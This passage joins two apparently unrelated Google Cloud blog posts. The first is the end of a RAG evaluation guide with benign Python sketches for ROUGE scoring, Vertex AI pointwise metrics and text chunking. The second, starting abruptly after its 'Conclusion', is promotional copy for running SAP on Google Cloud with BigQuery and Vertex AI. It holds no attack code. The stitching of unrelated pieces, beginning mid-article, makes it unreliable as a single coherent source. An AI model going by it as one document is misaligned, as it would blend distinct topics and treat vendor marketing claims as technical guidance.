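
```python
# Minimal sketch: a computation-based metric (ROUGE) compared against a
# golden reference answer. Requires: pip install rouge-score
from rouge_score import rouge_scorer

reference = "Spanner offers five 9s of availability with global consistency."
candidate = "Spanner provides 99.999% availability and global consistency."

scorer = rouge_scorer.RougeScorer(["rouge1", "rougeL"], use_stemmer=True)
scores = scorer.score(reference, candidate)
for name, score in scores.items():
    print(f"{name}: precision={score.precision:.2f} "
          f"recall={score.recall:.2f} f1={score.fmeasure:.2f}")
```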
Opinionated tiger team actions
Collaborate with stakeholders to develop a set of “golden” question inputs. These questions should accurately reflect the main use cases the RAG system is intended to address. It’s crucial to include a diverse range of query types, such as simple, complex, multi-part, and misspelled queries to ensure comprehensive testing.
Make use of the Vertex AI generative AI evaluation framework. This framework allows developers to quickly implement multiple test metrics, and run multiple tests on a model’s performance with minimal setup. It offers a fast feedback loop, so improvements can be made rapidly (a minimal sketch follows this list).
Conduct a pointwise evaluation of the RAG retrieval system.
Generate model scores based on the following criteria:
Response groundedness: The extent to which the generated text aligns with the factual information retrieved from the source documents.
Verbosity: The length and detail of the response. While beneficial for providing comprehensive understanding, excessive verbosity may indicate difficulty in concisely and accurately answering the question. You may wish to tune this metric based on your use case.
Instruction following: The system’s ability to generate text that accurately and comprehensively adheres to given instructions, ensuring the output is relevant and aligned with user intent.
Question answer quality as related to instructions: The ability of the RAG system to generate text that correctly answers a user’s question with a high level of detail and coherence.
Store results in a shared location such as Vertex AI Experiments, which allows for simple comparisons over time.
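Below is a minimal sketch of those actions using the Vertex AI gen AI evaluation service from the Python SDK. The project, dataset rows, and experiment names are hypothetical; depending on your SDK version, the evaluation module may live under vertexai.preview.evaluation, and the available metric constants may differ.

```python
# Minimal sketch: pointwise RAG evaluation with the Vertex AI gen AI
# evaluation service. Project, data, and experiment names are hypothetical.
import pandas as pd
import vertexai
from vertexai.evaluation import EvalTask, MetricPromptTemplateExamples

vertexai.init(project="my-project", location="us-central1")

# Bring-your-own-response mode: the RAG system's answers are evaluated as-is.
eval_dataset = pd.DataFrame(
    {
        "prompt": ["What is our PTO carry-over policy?"],
        "response": ["Employees may carry over up to 5 unused PTO days..."],
        "reference": ["Up to 5 unused PTO days may be carried into the next year."],
    }
)

eval_task = EvalTask(
    dataset=eval_dataset,
    metrics=[
        MetricPromptTemplateExamples.Pointwise.GROUNDEDNESS,
        MetricPromptTemplateExamples.Pointwise.VERBOSITY,
        MetricPromptTemplateExamples.Pointwise.INSTRUCTION_FOLLOWING,
        MetricPromptTemplateExamples.Pointwise.QUESTION_ANSWERING_QUALITY,
    ],
    experiment="rag-evaluation",  # results land in Vertex AI Experiments
)
result = eval_task.evaluate(experiment_run_name="baseline-run")
print(result.summary_metrics)
```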
Step 2. Root cause analysis and iterative testing
The goal of setting up a repeatable testing framework is to understand the root cause of issues. RAG is fundamentally based on two components: (1) the retrieval accuracy of your nearest neighbor matches, and (2) the context that you provide to the LLM that generates your responses.
Identifying and isolating these components individually allows you to determine the specific areas that may be causing problems, and to formulate testable hypotheses that can be run as experiments in Vertex AI using the gen AI evaluation framework.
Typically, when performing a root cause analysis exercise, the user will execute a testing run as a baseline, modify the implementation of one of the RAG components, and re-execute the testing run. The delta between the output scores of the testing metrics is the influence of the RAG component that was altered. The goal in this phase is to modify and document the components carefully, aiming to optimize towards a maximum score for each of the chosen metrics. Often the temptation is to make multiple modifications between testing runs, which can mask the impact of a specific change and whether it succeeded in creating a measurable difference in your RAG system.
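The bookkeeping for this comparison can stay simple. Here is a minimal sketch of the per-metric delta described above; the metric names and scores are hypothetical summary values from your testing framework.

```python
# Minimal sketch: the per-metric delta between a baseline evaluation run and
# a run where exactly one RAG component was changed. Metric names and scores
# are hypothetical.
baseline = {"groundedness": 3.8, "verbosity": 4.1, "qa_quality": 3.5}
candidate = {"groundedness": 4.2, "verbosity": 4.0, "qa_quality": 3.9}

deltas = {metric: candidate[metric] - baseline[metric] for metric in baseline}
print(deltas)  # attributable to the single component that changed
```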
Examples of RAG experiments to run
Example RAG components to experiment with:
What is the ideal number of neighbors for a document chunk that gets passed into an LLM to improve answer generation?
How does embedding model choice affect retrieval accuracy?
How do different chunking strategies affect quality? For example, adjusting variables like chunk size or overlap, or exploring strategies such as pre-processing chunks to summarize or paraphrase them with a language model.
When it comes to generation, simply comparing Model A vs. Model B or Prompt A vs. Prompt B is particularly useful for fine-tuning prompt design or adjusting model configurations, helping developers to optimize models and prompts for specific use cases.
What happens when you enrich documents with metadata like title, author, and tags for better retrieval signals?
Opinionated tiger team actions
Test model A vs model B for generation tasks (simple and can produce measurable results)
Test chunking strategies for retrieval within a single embedding model (400 chars, 600 chars, 1200 chars, full document text); see the chunking sketch after this list.
Test pre-processing of long chunks to summarize them to smaller chunk sizes.
Test what data is passed to the LLM as context. For example, do we pass the matched chunks themselves, or use these as a lookup to find the source document and pass the whole document text to the LLM, making use of long context windows.
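To get the chunking experiments started, here is a minimal sketch of a fixed-size character chunker with overlap, matching the strategies listed above; the source document, overlap value, and downstream indexing step are illustrative assumptions.

```python
# Minimal sketch: a fixed-size character chunker with overlap, used to
# generate the competing chunking strategies listed above.
def chunk_text(text: str, chunk_size: int, overlap: int = 50) -> list[str]:
    """Split text into chunks of chunk_size characters, overlapping by overlap."""
    step = chunk_size - overlap
    return [text[start : start + chunk_size] for start in range(0, len(text), step)]

document = open("policy_doc.txt").read()  # hypothetical source document
for size in (400, 600, 1200):
    chunks = chunk_text(document, chunk_size=size)
    print(f"{size}-char strategy -> {len(chunks)} chunks")

# Each strategy's chunks are embedded and indexed separately, then scored
# with the same battery of test questions to isolate the chunking variable.
```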
Step 3. Human evaluation
Although quantitative metrics created by your testing framework provide valuable data, qualitative feedback from real users is also crucial. Automated testing tools are efficient for scalability and rapid iteration, but they cannot replicate human judgment in ensuring high-quality output. Human testers can evaluate subtle aspects like the tone of responses, the clarity of explanations, and potential ambiguity. Combining qualitative and quantitative testing provides a more holistic understanding of your RAG system’s performance.
Human tests are typically run after you’ve achieved a solid level of baseline answer quality by optimizing evaluation metrics through the automated testing framework. You may wish to include human response evaluation as part of your broader user-testing motions for the system as a whole, such as performance, UX, etc. Similar to previous experiments, human testers can focus on specific system features following structured steps, or they can assess the overall application and provide comprehensive qualitative feedback.
Because human testing is time consuming and repetitive, it is essential to identify users who are engaged and willing to provide meaningful feedback.
Opinionated tiger team actions
Identify key personas based on the RAG system’s target users
Recruit a representative sample of participants that matches these personas to ensure realistic feedback.
If possible, include both technical and non-technical user groups for testing
Sit with the user (if possible) to ask follow-up questions and dig into the detail of their responses
Conclusion
To begin your own evaluation, explore Google Cloud’s generative AI evaluation service, where you can create both prebuilt and custom evaluation methodologies to enhance your RAG system.
As the 2027 end of support for SAP Business Suite 7 approaches, SAP customers need to decide where to deploy as they upgrade to cloud-based S/4HANA and RISE with SAP. This represents a great opportunity to get more value out of your enterprise data, and take advantage of the longstanding partnership between Google Cloud and SAP. RISE with SAP on Google Cloud lets you accelerate innovation and reduce costs through a secure, reliable, and scalable high-performance infrastructure. By deploying SAP on Google Cloud, you can accelerate your ERP transformation with a unique, unified data experience that offers leading integration, analytics accelerators, and AI innovations to bring clarity from data to decisions.
Two data powerhouses unite
Key to the Google Cloud-SAP partnership is the integration between BigQuery, a fully managed, AI-ready data analytics platform that helps you maximize value from your data, and SAP Datasphere. BigQuery is designed to be multi-engine, multi-format, and multi-cloud. This integration lets you access your most critical data in real time without duplication thanks to co-engineered data replication and federation technologies. This joint capability can unify data from SAP software systems, such as SAP S/4HANA and SAP HANA Cloud, providing organizations with a comprehensive view of their most important data on Google Cloud and letting you:
Simplify data landscapes. Federate queries across SAP Datasphere and BigQuery to blend data from SAP and non-SAP software. This minimizes common data silos from sources that span marketing, sales, purchasing, finance, supply chain, manufacturing and more.
Improve decision-making. Gain a more holistic view of your data and leverage powerful analytics to drive better decision-making. Now, you can plan with a single, comprehensive view of your businesses by connecting SAP data to powerful data and analytics tools such as Vertex AI to analyze financial and business outcomes while improving the accuracy of models.
Add rich context to your analytics. BigQuery makes it easy to bring in Google and third-party data sources such as Trends, Weather, Maps, world events and Enterprise application data with Google Cloud Cortex Framework’s pre-built accelerators.
Use SAP Business Technology Platform (SAP BTP) globally on Google Cloud. SAP is advancing its multi-cloud offerings by expanding regional support of SAP BTP and SAP HANA Cloud on Google Cloud, which includes support for SAP Analytics Cloud and SAP Datasphere. SAP and Google Cloud intend to launch SAP BTP in five new regions, building to a total of eight regions supported by 2025.
Transform your business with AI
Google Cloud has powerful, easy-to-use tools to help you incorporate your SAP data into predictive and generative AI initiatives. Vertex AI provides a single, integrated development platform where you can build sophisticated predictive and generative AI agents and experiences faster — without any manual ETL.
Innovate freely with Model Garden, a curated collection of over 150 machine learning models. Google is the only cloud provider to offer widely used first-party, third-party, and open-source models, so you can easily discover and choose foundation models based on modality, size, performance, latency, and cost.
Leverage Google’s most powerful model yet. Gemini is Google’s most capable and general family of LLMs, offering four models each built for its own set of use cases. Google Cloud recently announced multiple Gemini updates that enable SAP users to bring more gen AI capabilities to SAP workloads and access Google Cloud’s large language models through SAP GenAI Hub.
Get more from your models by augmenting and grounding them with SAP data. Leverage Vertex AI Model Builder’s managed tooling for extensions, function calling, and grounding. Customize Gemini models in an efficient, lower-cost way with supervised tuning.
Easily deploy, manage, and monitor agents with Vertex AI Agent Builder, which lets you quickly create a range of generative AI agents grounded with Google Search and your SAP data with the convenience of a no-code agent builder console.
Run SAP today on tomorrow’s infrastructure
Google Cloud helps SAP customers build quickly, securely, and cost-effectively with the next generation of infrastructure designed to meet specific workload and industry needs. Google Cloud infrastructure is optimized for AI and cloud-first enterprise workloads, with an emphasis on security, scalability, and data sovereignty.
Leverage superior scale-up machine types. Google Cloud is the sole provider of 32TB SAP-certified machines, simplifying architecture, deployments, and administration. Most recently, Google Cloud introduced memory-optimized X4 instances, the largest SAP-certified compute instances in the cloud market, supporting SAP HANA workloads of up to 32TB.
Accelerate time to value. Google Cloud Cortex Framework delivers pre-built analytics and AI content based on SAP data models, with out-of-the-box SAP integration. Cortex comes with pre-built dashboards for visualizing SAP data and enriches it with AI/ML services and external datasets such as weather, search trends, ad impressions, and more (see the sketch after this list).
Increase agility and scalability. Unlike on-premises infrastructure, Google Cloud offers on-demand scalability, letting you easily adjust resources to match changing business needs, up to massive scale if required. This agility can be crucial for responding to market fluctuations or unexpected growth.
Improve performance and efficiency. Google Cloud’s infrastructure is designed for high performance and reliability. This can lead to faster processing times and reduced latency for your SAP applications, improving overall efficiency and the user experience.
A highly secure cloud. As customers grow increasingly concerned about DDoS attacks, emerging vulnerabilities, and security-driven outages, Google Cloud customers continue to value its consistent availability. With robust security features and compliance certifications, Google Cloud can help give you peace of mind that your data is secure and your business meets regulatory requirements.
Meet sustainability goals. SAP and Google Cloud are exploring ways to combine SAP Datasphere with broader ESG data sets and insights powered by Google Cloud to accelerate sustainability journeys with actionable insights.
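As a rough illustration of the enrichment pattern that Cortex Framework enables, the sketch below joins a hypothetical Cortex-style SAP reporting view with BigQuery’s public NOAA weather dataset. The sales view and its columns are assumptions for illustration; the views Cortex actually deploys depend on your installation:

# Sketch: correlate daily SAP sales (hypothetical Cortex view) with public weather data.
from google.cloud import bigquery

client = bigquery.Client(project="my-analytics-project")  # hypothetical project ID

query = """
SELECT
  sales.order_date,
  SUM(sales.net_value) AS daily_sales,
  AVG(weather.temp) AS avg_temp_f
FROM `my-analytics-project.cortex_reporting.sales_orders` AS sales  -- hypothetical view
JOIN `bigquery-public-data.noaa_gsod.gsod2024` AS weather           -- real public dataset
  ON sales.order_date = DATE(CAST(weather.year AS INT64),
                             CAST(weather.mo AS INT64),
                             CAST(weather.da AS INT64))
GROUP BY sales.order_date
ORDER BY sales.order_date
"""

for row in client.query(query).result():
    print(row.order_date, row.daily_sales, row.avg_temp_f)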
Real-world results with RISE on Google Cloud
SAP customers are already getting more out of their technology investments by migrating to Google Cloud.
Hunkemöller
Hunkemöller, a leading European lingerie brand with over 850 stores in 22 countries, aimed to enhance its customer experience and support its omnichannel growth strategy. The company migrated its SAP environment and IT infrastructure to Google Cloud using RISE with SAP. This move allowed Hunkemöller to leverage Google Cloud’s data and analytics capabilities, enabling more precise customer segmentation and personalized recommendations, leading to improved customer experiences and reduced returns.
“By moving our on-premise data to the cloud and leveraging Google Cloud technologies, we can provide our customers with the best possible customer experience—digitally driven and supported by data. Developments happen at lightspeed in retail, and we want to be a market leader when it comes to digital applications and use of data for a better customer experience and operation of the business. We worked intensively with experts from Google Cloud and partners to realize the blueprint for cloud migration.” – Gordon Smit, Global IT Director, Hunkemöller
Cementos Pacasmayo
A leading producer of construction solutions in Northern Peru, Cementos Pacasmayo built a data ecosystem using the Cortex Framework, SAP, and Vertex AI on Google Cloud to provide stakeholders across all departments with fast, broad, and deep visibility into data.
“Before, three people had to work for eight hours to generate a business analysis. Now business users don’t have to wait for computer scientists or data analysts. They can act autonomously to immediately gain valuable insights thanks to automation and rich, centralized information.” – Franz Zárate, Technical Tribe Lead Data & Analytics, Cementos Pacasmayo
This is just the beginning
Google Cloud and SAP continue to collaborate, with new co-innovations coming online all the time, making Google Cloud a compelling choice for your SAP modernization initiative. Together, Google Cloud and SAP have made it easy to activate your SAP data with Google Cloud Cortex Framework and Vertex AI. Now you can enable advanced analytics, build cutting-edge AI/ML and generative AI applications, retain end-to-end business context for enterprise AI, and shorten time to value with instant access to your SAP data, all without thousands of hours of integration and development work.